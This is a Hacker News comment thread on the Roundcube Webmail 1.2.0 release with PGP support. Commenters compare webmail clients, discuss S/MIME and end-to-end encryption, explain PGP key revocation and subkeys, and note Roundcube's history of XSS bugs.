
Roundcube Webmail 1.2.0 released with PGP support - weeha
https://roundcube.net/news/2016/05/22/roundcube-webmail-1.2.0-released
======
benbristow
Rainloop already has this.
[http://www.rainloop.net/](http://www.rainloop.net/)

Been using it for a year or so now, it's fantastic and has never let me down.

~~~
gravypod
I came here to comment about this. Rainloop is amazing.

It also has some extra security features for the end user. For instance, you
can tell Rainloop to proxy images from the email and serve them to you instead
of your browser getting them from a remote source. It's amazing because you
get faster load times and don't leak your desktop IP, only whatever server
your running Rainloop on.

The only thing it's lacking is PGP, which is very sad.

~~~
unethical_ban
Wait, the parent said Rainloop has PGP. That's why they brought it up.

~~~
JohnTHaller
The features page states: " Client Side OpenPGP (JS) "

~~~
gravypod
It's not fully implemented from what I understand.

------
rmoriz
I wish someone would do this for S/MIME. S/MIME has native support in many
MUAs, even Mail.app on iOS. [http://smime.io/](http://smime.io/)

[https://github.com/roundcube/roundcubemail/issues/4977](https://github.com/roundcube/roundcubemail/issues/4977)

~~~
grinich
Is S/MIME really that widely used? It seems to be sort of widely deployed, but
not necessarily understood or required by users in secure environments.

~~~
rmoriz
yes. And it's already supported in many clients without plugins, many
companies just sign their mails. You probably don't even notice that if you
don't know where to look. It's very unobtrusive compared to gpg.

------
embik
For everyone who (like me) wondered what happened to "Roundcube Next", they
released a statement 8 days ago[1] about it. Sounds like they had personal
problems getting in the way. Glad to see the project is still alive.

[1] [https://www.indiegogo.com/projects/roundcube-next--
2#/update...](https://www.indiegogo.com/projects/roundcube-next--2#/updates)

~~~
teekert
Thanx for the update, I tweeted them repeatedly, never getting any reply. It
looks pretty bad that the last tweet is so old. In the meantime, I've been
using Nylas N1 (local mail client) and ownCloud mail (webmail), both have
become pretty good!

~~~
grinich
Thanks for the kind words! (I work at Nylas.)

We actually have PGP support coming soon as well. ;)

~~~
teekert
Oh, thanx for the product! One question, I just read here on HN that Nylas
stores certain data on Nylas servers. I actually thought it was just a local
mail client like Thunderbird (only better looking and more modern). It's not
very clear from the website what exactly happens to my mail and login
credentials, do you have some pointers?

~~~
grinich
Sure, here's a bit more info: [https://support.nylas.com/hc/en-
us/articles/217518207-Why-do...](https://support.nylas.com/hc/en-
us/articles/217518207-Why-does-Nylas-N1-sync-email-via-the-cloud-)

A bit more here: nylas.com/blog/nylas-pro

We've spent a lot of time on this and the setup screens pretty clearly say
this syncs your data to the cloud for performance and speed.

You can also write me directly if you have specific questions. Thanks!

------
Sephr
It's nice to hear about the server-side PGP support (searching!), although
it's unfortunate that the client-side solution, Mailvelope (or more
specifically, the OpenPGP.js library it uses), still doesn't support any ECC
algorithms.

Fortunately Google's End-to-End extension does support ECC algorithms (no idea
if it integrates with Roundcube though), but it seems like it still isn't
ready for production distribution on the Chrome Web Store yet.

~~~
mikekchar
I may be wrong (and hope to be corrected!), but I think that End-to-End is
never expected to be in the Chrome Web Store. I think they feel that this kind
of encryption is too complicated for the average user. It's intended more for
"power users" who already know that they want it.

~~~
SquareWheel
They've discouraged people from compiling builds and then uploading it to the
store, but I believe this is because they don't want a half-
implemented/untested PGP library posted -- especially one with their name on
it.

I haven't seen any concrete plans about how they plan to distribute it when
it's done, but I didn't get the same sense about them not wanting to upload it
themselves. In fact, I think Google would be thrilled to push proper end-to-
end support in Gmail.

~~~
riprowan
Sorry if this is a dumb question, but if Gmail is e2e, how can Google harvest
user data from it?

~~~
SquareWheel
They couldn't. They would have to show ads from other history and not the
email's contents. This would also break features such as (server-side) search
and reminders (eg. flight tomorrow) via Google Now.

End-to-end is a tradeoff. But presumably they wouldn't be working on the
technology if they weren't prepared to offer it in some fashion. Probably as
an opt-in? Hopefully a Googler can offer more insight as I can only speculate.

~~~
ryanl0l
>They couldn't. They would have to show ads from other history and not the
email's contents. This would also break features such as (server-side) search
and reminders (eg. flight tomorrow) via Google Now.

Sure they could, all incoming emails aren't magically going to become e2e
encrypted.

~~~
SquareWheel
Well, no. But that's not really end-to-end, is it?

If the goal is to make E2E more accessible then eventually more emails will
come in encrypted. Maybe Google will let users with the extension find each
other, or Gmail might help coordinate that.

~~~
ryanl0l
Sure, but I'd imagine that most email traffic is automated non-sensitive stuff
(i.e. flight confirmations for example). That stuff is simply not going to be
e2e encrypted any time soon, if ever.

Are people going to start filling in their pubkeys when they book a flight?
What about when they're at the airport and need to pull up the record locator
on a different device?

I'm sure more emails will start being encrypted, but that'll mostly be
communications between people. Those probably aren't particularly interesting
to google anyway.

~~~
SquareWheel
I'd give it time. People won't enter their public keys when booking a flight,
but it might be associated with their email address automatically. I could see
Google running a service like Keybase. Or even integrating it further into
whatever the next hip "online identity" service is. Built in privacy would be
a huge boon.

The flight company (or email sender they use) could then request your public
key and send off your message. And with some common protocols and APIs the
complexity could be largely abstracted away.

I wouldn't underestimate the technology. When you look at more complex systems
like internet routing tables, these problems feel a lot more solvable. We
already have the technology for most of this. The problem right now is making
it accessible.

------
xvilka
I recommend to try also Mailpile [1], which was built with security in mind.

[1] [https://www.mailpile.is/](https://www.mailpile.is/)

~~~
bildung
As far as I understood Mailpile is a mail user agent, so not comparable.
Roundcube runs on a server, Mailpile runs on your own computer.

~~~
taneliv
"You can [then] access it over the network using your web browser"
[https://www.mailpile.is/faq/#wha-2](https://www.mailpile.is/faq/#wha-2) seems
to challenge your knowledge. I don't know if using it so compromises privacy
in unexpected ways, or indeed even works satisfactorily; I am not a user.

~~~
bildung
It now indeed seems to be the planned path to create a full webmail service
out of Mailpile. Though right now the developers still say its "written as a
personal application":
[https://www.mailpile.is/faq/#tec-8](https://www.mailpile.is/faq/#tec-8)

------
CiPHPerCoder
[https://github.com/roundcube/roundcubemail/issues/5266](https://github.com/roundcube/roundcubemail/issues/5266)

Legacy PHP code (as old as 5.3.7) strikes again.

------
arviewer
I guess this means you have to upload your private key to the server. I always
wonder what happens when the key is copied and used by someone else. Can you
revoke the key? What happens to sent and received messages from the past? Do
you still need the old key (private or public) to read those? Is there a
private master key that can create a private sub key that can be used to
upload to that server?

~~~
elgaton
Encryption is also supported via a browser plugin, so it's not necessary to
upload the private key to the server. Regarding your questions: 1) yes, you
can revoke the key by generating a revocation certificate and publishing it on
a public keyserver (of course, your correspondents would need to refresh the
public key from the keyserver to know it was revoked, which is something they
might not do); 2) sent and received messages from the past, unfortunately, are
readable by the person who is in possession of the private key, if such key is
not protected by a strong password; 3) yes, you still need the old private key
to read the old messages; 4) you can generate a master key (to be kept
strictly offline) and several, frequently rotating subkeys for encryption
purposes. It's not a silver bullet solution (in the sense that a thief would
still have access to all your subkeys, meaning he could read all your messages
up to the point the keys are stolen, but it mitigates the damage somehow). See
here: [https://alexcabal.com/creating-the-perfect-gpg-
keypair](https://alexcabal.com/creating-the-perfect-gpg-keypair)

------
xrorre
Here's an old XSS exploit for Roundcube from 2013:

[https://www.intelligentexploit.com/view-
details.html?id=1696...](https://www.intelligentexploit.com/view-
details.html?id=16961)

I still use RC despite the long history of XSS attacks against it. Luckily RC
uses progressive enhancement, so it still works with JS turned off. I just
assume emails can still execute JS in 2016? Perhaps it's wrong of me to use RC
with JS turned off as a preventative measure, but you have to adore that user
interface! It's the only reason I choose RC over other self-hosted email web
apps (and there are few to choose from in this space). I like the simplicity
of Squirrel-mail, but Roundcube looks and feels too good _not_ to use.

~~~
dguido
You're right. Before any integration of a server-side PGP key like this, they
ought to have deployed some basic hygiene like a strict Content Security
Policy (CSP) and a better sanitization library like HTMLpurifier. I don't
trust webmail software, and definitely not PHP webmail software, to hold my
keys for me otherwise.

------
bechampion
ha i remember long time ago chasing for the perfect webmail system.. before
gmail of course. Horde,Roundcube, squirrel god... I've never found the perfect
one!

~~~
ryanlol
How about OWA? Despite requiring windows, it's a pretty solid product.

~~~
jethro_tell
It doesn't require Windows. It's a web app . . . that is pretty rough.

~~~
ryanlol
I don't think you can run the web app on linux.

~~~
jethro_tell
Based on what?

I run the web app on my Linux box for Calendaring and sometimes email.

Most of the time I use mutt with imap for email. But I run the web app 40+
hours per week.

~~~
ryanlol
I am talking about hosting the application, of course you can interface with
the web app from whatever.

------
zby
If PGP was managed by the browser we would be able to sign everything we post
on the web, not just the emails.

~~~
lmm
There are extensions that do this. A standardized interface between site and
browser-managed crypto is what's really needed though.

------
mrmondo
I get the feeling we need a 'gogs of a webmail app'

------
BorisMelnik
nice, I use Roundcube a lot for new clients looking to set up their email for
the first time. Glad to support this project, and really stoked it has PGP.

------
tiatia
Nice.

But I prefer Afterlogic
[http://www.afterlogic.com/](http://www.afterlogic.com/)

Wish I was open source/freeware

~~~
mrmondo
Hmmm... They give out an option of PHP or .NET, not sure I'd really like to
run either of those?

